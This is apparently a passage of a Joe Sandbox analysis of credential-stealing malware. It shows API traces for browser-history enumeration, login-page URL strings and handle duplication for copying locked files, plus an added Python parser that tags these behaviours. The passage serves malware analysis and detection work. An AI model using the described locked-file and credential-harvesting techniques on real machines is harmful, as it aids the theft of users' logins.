                                                                                                  • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                  • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                  • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                                                  • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                    • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                    • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                    • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                    • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                    • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                  • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                  • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                    • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                    • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                    • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                  • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                  • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                  • String ID: bhv
                                                                                                  • API String ID: 4234240956-2689659898
                                                                                                  • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                  • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                  • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                                  • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
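The two API records above (the Toolhelp32 process walk at 413d4c and the OpenProcess/DuplicateHandle/CreateFileMappingW sequence at 40e093) are easier to reason about once the report's "• Name.MODULE(args), ref: addr" lines are parsed and the numeric arguments decoded. The Python below is an added example, not part of the Joe Sandbox report or of the Remcos sample: it embeds the two records as constructed input, decodes the OpenProcess access mask, the CreateToolhelp32Snapshot flags and the NtQuerySystemInformation class from the documented Win32/NTDLL constants, and then applies tagging rules that are this example's own heuristics (tag names such as "copies-foreign-file-handle-to-disk" are mine, not Joe Sandbox signatures).

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: the API lines of the two function records above,
# in the report's own "• Name.MODULE(args), ref: addr" form.
RECORD_PROCESS_ENUM = """
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
• memset.MSVCRT ref: 00413D7F
• Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
• OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
• CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
• CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
"""
RECORD_HANDLE_COPY = """
  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
• DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
• GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
• CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
• WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
• UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
• CloseHandle.KERNELBASE(?), ref: 0040E13E
"""

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^.\s]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Documented Win32 / NTDLL constants used for decoding the first argument.
PROCESS_ACCESS = {0x0010: "PROCESS_VM_READ", 0x0040: "PROCESS_DUP_HANDLE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
TH32CS = {0x2: "TH32CS_SNAPPROCESS", 0x8: "TH32CS_SNAPMODULE"}
SYSTEM_INFO_CLASS = {0x10: "SystemHandleInformation"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple          # raw argument column; '?' means the sandbox could not resolve the value
    ref: int             # address of the call site
    subcall_of: Optional[int]  # callee in which the call was found, or None for the function itself


def parse_api_record(text):
    """Parse one record's API lines into ApiCall objects (non-matching lines are skipped)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] is not None else ()
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def first_arg(call):
    """First argument as an int, or None when it is unknown ('?') or a string."""
    if not call.args:
        return None
    try:
        return int(call.args[0], 16)
    except ValueError:
        return None


def decode_flags(value, table):
    """Render a bit mask with the names in `table`; leftover bits are kept as hex."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"


def describe(call):
    """Human-readable form of a call; only the leading argument is trusted, because the
    sandbox's argument column is a raw stack read that runs past the real parameter count."""
    v = first_arg(call)
    if call.name == "OpenProcess" and v is not None:
        return f"OpenProcess(dwDesiredAccess={decode_flags(v, PROCESS_ACCESS)})"
    if call.name == "CreateToolhelp32Snapshot" and v is not None:
        return f"CreateToolhelp32Snapshot(dwFlags={decode_flags(v, TH32CS)})"
    if call.name == "NtQuerySystemInformation" and v is not None:
        return f"NtQuerySystemInformation(class={SYSTEM_INFO_CLASS.get(v, hex(v))})"
    return call.name


def classify(calls):
    """This example's own tagging heuristics (assumptions, not sandbox signatures)."""
    names = {c.name for c in calls}
    access = [a for a in (first_arg(c) for c in calls if c.name == "OpenProcess") if a is not None]
    tags = []
    if "CreateToolhelp32Snapshot" in names and names & {"Process32FirstW", "Process32NextW"}:
        tags.append("process-enumeration")
    if any(a & 0x40 for a in access) and "DuplicateHandle" in names:
        tags.append("handle-duplication-from-foreign-process")
        if names >= {"CreateFileMappingW", "MapViewOfFile", "WriteFile"}:
            tags.append("copies-foreign-file-handle-to-disk")
    if any(c.name == "NtQuerySystemInformation" and first_arg(c) == 0x10 for c in calls):
        tags.append("system-handle-table-walk")
    resolved = [c.args[1] for c in calls if c.name == "GetProcAddress" and len(c.args) > 1
                and not re.fullmatch(r"[0-9A-Fa-f]{8}|\?", c.args[1])]
    if resolved:
        tags.append("dynamic-api-resolution:" + ",".join(resolved))
    return tags


def summarize(text):
    calls = parse_api_record(text)
    return {"calls": [describe(c) for c in calls], "tags": classify(calls)}


if __name__ == "__main__":
    for label, rec in (("413d4c", RECORD_PROCESS_ENUM), ("40e093", RECORD_HANDLE_COPY)):
        s = summarize(rec)
        print(label, s["tags"])
        for line in s["calls"]:
            print("   ", line)
```

Two details the decoded output makes visible that the raw record does not: the 0x410 mask at 413d4c is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, which is what GetModuleFileNameExW needs (QueryFullProcessImageNameW would be satisfied by PROCESS_QUERY_LIMITED_INFORMATION alone), and the 0x40 mask at 40e093 is PROCESS_DUP_HANDLE, which together with the SystemHandleInformation walk in the subcall at 40dd85 and the DuplicateHandle/CreateFileMappingW/WriteFile chain is the usual way to read a file that another process holds open with a sharing lock. Treat the remaining argument columns as noise: the sandbox prints stack slots past the real parameter count, so only the leading values are decoded here.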

                                                                                                  Control-flow Graph

                                                                                                  Control-flow Graph (rendered graph; the executed/not-executed colouring is not preserved). Basic blocks 413f4f-413fa5: 413f4f-413f52 branches either straight to 413fa5 or to 413f54-413f5a call 40a804, followed by 413f5f-413fa4 GetProcAddress * 5 and then 413fa5.
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                  • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                  • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                  • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                  • API String ID: 2941347001-70141382
                                                                                                  • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                  • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                  • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                  • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                  Control-flow Graph

                                                                                                  Control-flow Graph (rendered graph; the executed/not-executed colouring is not preserved). CRT entry point, basic blocks 4466f4-4468dd: 4466f4-44670e call 446904, GetModuleHandleA; 44675b-4467aa __set_app_type, __p__fmode, __p__commode, call 4153f2; 4467ac-4467b7 __setusermatherr; 4467b8-44680e call 4468f0, _initterm, __wgetmainargs, _initterm; 446853-446864 GetStartupInfoW; 44687c-446894 GetModuleHandleA, call 41276d; 446896-446897 exit; 44689d-4468d6 _cexit; 4468d8-4468dd call 44693d.
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2827331108-0
                                                                                                  • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                  • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                                  • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                                  • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040C298
                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                    • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                  • wcschr.MSVCRT ref: 0040C324
                                                                                                  • wcschr.MSVCRT ref: 0040C344
                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                  • GetLastError.KERNEL32 ref: 0040C373
                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                                  • String ID: visited:
                                                                                                  • API String ID: 1157525455-1702587658
                                                                                                  • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                  • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                  • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                                  • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                  Control-flow Graph

                                                                                                  Control-flow Graph (rendered graph; the executed/not-executed colouring is not preserved). Basic blocks 40e175-40e2a8: 40e175-40e1a1 call 40695d, call 406b90; 40e1a7-40e1e5 memset; loop between 40e1e8-40e1fa call 406e8f and 40e270-40e27d call 406b53, with body 40e1fc-40e219 call 40dd50 * 2, 40e21f-40e235 call 40742e, 40e237-40e242 call 40aae3, 40e244-40e26b _snwprintf + call 40a8d0; exit path 40e288-40e290 free, 40e291-40e294 call 40aa04, 40e299-40e2a8 call 4069a3.
                                                                                                  APIs
                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                  • memset.MSVCRT ref: 0040E1BD
                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                  • free.MSVCRT ref: 0040E28B
                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                    • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                    • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                  • _snwprintf.MSVCRT ref: 0040E257
                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                  • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                  • API String ID: 2804212203-2982631422
                                                                                                  • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                  • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                  • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                                  • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                  • memset.MSVCRT ref: 0040BC75
                                                                                                  • memset.MSVCRT ref: 0040BC8C
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                  • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                  • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                  • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 115830560-3916222277
                                                                                                  • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                  • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                  • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                  • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                  Control-flow Graph

                                                                                                  Control-flow Graph (rendered graph; the executed/not-executed colouring is not preserved). Basic blocks 41837f-41851d: 4183c1-4183cc call 418197; 4183dc-4183ec call 418160; 418427-418442 call 41739b; then either 418444-41845d CreateFileW or 41845f-418475 CreateFileA; after the CreateFile call one branch goes to 41847e-418495 GetLastError + free and from there to 418497-4184b3 (recursive call 41837f) or 4184b5-4184c0 call 444706, the other to 4184d5-418501 memset + call 418758 and 418506-418515 free; all paths end at 418517-41851d.
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                  • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                  • GetLastError.KERNEL32 ref: 0041847E
                                                                                                  • free.MSVCRT ref: 0041848B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile$ErrorLastfree
                                                                                                  • String ID: |A
                                                                                                  • API String ID: 77810686-1717621600
                                                                                                  • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                  • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                  • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                  • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041249C
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                  • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                  • wcscpy.MSVCRT ref: 004125A0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                  • String ID: r!A
                                                                                                  • API String ID: 2791114272-628097481
                                                                                                  • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                  • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                  • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                  • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                    • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                    • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                    • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                    • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                    • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                    • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                    • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                    • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                  • _wcslwr.MSVCRT ref: 0040C817
                                                                                                    • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                    • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                  • wcslen.MSVCRT ref: 0040C82C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                  • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                  • API String ID: 2936932814-4196376884
                                                                                                  • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                  • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                  • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                  • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                  • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                  • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                  • String ID: BIN
                                                                                                  • API String ID: 1668488027-1015027815
                                                                                                  • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                  • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                  • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                  • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                  APIs
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                    • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
